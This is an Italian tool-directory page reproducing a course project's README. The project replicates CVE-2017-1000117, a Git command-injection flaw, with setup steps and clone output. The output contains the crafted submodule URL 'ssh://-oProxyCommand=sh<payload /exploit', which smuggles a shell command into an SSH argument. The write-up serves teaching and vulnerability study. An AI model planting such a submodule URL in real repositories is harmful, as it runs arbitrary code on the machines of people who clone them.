Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-1000117 — Riproduzione della vulnerabilità CVE-2017-1000117(PoC+Exp) | Kitploit
Strumenti/GitHubGitHub/anonymking/cve-2017-1000117
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubanonymking/cve-2017-1000117

CVE-2017-1000117

Riproduzione della vulnerabilità CVE-2017-1000117(PoC+Exp)

Vedi Repository
3217 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2017-1000117

Introduzione al progetto

  • Uno dei temi del progetto del corso di sicurezza informatica
  • Replicazione della vulnerabilità CVE-2017-1000117 (PoC+Exp)
  • Git + SSH

Introduzione alla vulnerabilità:

  • Nome vulnerabilità: Vulnerabilità di iniezione di comandi Git
  • ID CNNVD: CNNVD-201708-670
  • Livello di pericolosità: Medio
  • ID CVE: CVE-2017-1000117
  • Tipo vulnerabilità: Iniezione di comandi
  • Data di pubblicazione: 2017-08-16
  • Tipo minaccia: Remota
  • Data di aggiornamento: 2017-10-17
  • Produttore: git-scm
  • Fonte vulnerabilità: TrevorJay
  • Introduzione: Git è un sistema di controllo versione distribuito gratuito e open source sviluppato dallo sviluppatore statunitense Linus Torvalds. Esiste una vulnerabilità di comandi nelle versioni precedenti a Git 2.7.5. Un attaccante remoto può sfruttare questa vulnerabilità tramite un URL 'ssh://...' appositamente creato per eseguire programmi arbitrari su dispositivi remoti.

Procedimento di sfruttamento

  • Installare una versione di Git all'interno dell'intervallo di vulnerabilità (Git per Linux, Git per Windows)
  • Qui ho scelto la versione (testato personalmente su Linux e Windows, questa versione è utilizzabile) (gli indirizzi di download per la versione su Linux e Windows sono rispettivamente , )
git-2.12.1
2.12.1
git-2.12.1.tar.gz
Git-2.12.1-64-bit.tar.bz2
  • Dopo aver installato Git, clonare il progetto includendo i sottomoduli: git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
  • root@kitploit:~
    $ git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
    Cloning into 'CVE-2017-1000117'...
    remote: Enumerating objects: 14, done.
    remote: Counting objects: 100% (14/14), done.
    remote: Compressing objects: 100% (13/13), done.
    remote: Total 14 (delta 3), reused 8 (delta 0), pack-reused 0
    Unpacking objects: 100% (14/14), done.
    Submodule 'exploit' (ssh://-oProxyCommand=sh<payload /exploit) registered for path 'exploit'
    Cloning into 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit'...
    Pseudo-terminal will not be allocated because stdin is not a terminal.
    
    
    *********************************************
                       _ooOoo_
                      o8888888o
                      88" . "88
                      (| -_- |)
                      O\  =  /O
                   ____/`---'\____
                 .'  \\|     |//  `.
                /  \\|||  :  |||//  \
               /  _||||| -:- |||||-  \
               |   | \\\  -  /// |   |
               | \_|  ''\---/''  |   |
               \  .-\__  `-`  ___/-. /
             ___`. .'  /--.--\  `. . __
          ."" '&lt;  `.___\_&lt;|>_/___.'  >'"".
         | | :  `- \`.;`\ _ /`;.`/ - ` : | |
         \  \ `-.   \_ __\ /__ _/   .-` /  /
    ======`-.____`-.___\_____/___.-`____.-'======
                       `=---='
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    
    ssh_exchange_identification: Connection closed by remote host
    fatal: Could not read from remote repository.
    
    Please make sure you have the correct access rights
    and the repository exists.
    fatal: clone of 'ssh://-oProxyCommand=sh<payload /exploit' into submodule path 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit' failed
    Failed to clone 'exploit'. Retry scheduled
    
    • Quando vedi apparire il Buddha, la vulnerabilità è stata replicata e il codice malevolo nel payload è stato eseguito con successo.

    2019/06/21 10:30 Aggiornamento

    • Scrivendo il rapporto ho scoperto che questa vulnerabilità è molto simile a CVE-2018-17456, solo in un'altra forma. La causa principale è che entrambe non riescono a interpretare correttamente il simbolo '-', scambiandolo per un parametro, portando così all'esecuzione arbitraria di codice.
    • Per lo sfruttamento della vulnerabilità CVE-2018-17456, fare riferimento a questo articolo del blog: 《Analisi della vulnerabilità Git Submodule (CVE-2018-17456)》

    2019/06/21 19:39 Aggiornamento

    • Cercando materiali correlati, ho trovato un'altra vulnerabilità molto simile: CVE-2018-11235
    • A riguardo della vulnerabilità CVE-2018-11235, ecco alcuni articoli di riferimento: CVE-2018-11235 git RCE, PoC exploit per CVE-2018-11235, Analisi dettagliata della vulnerabilità di esecuzione remota di codice Git (CVE-2018-11235)
    Scarica lo strumento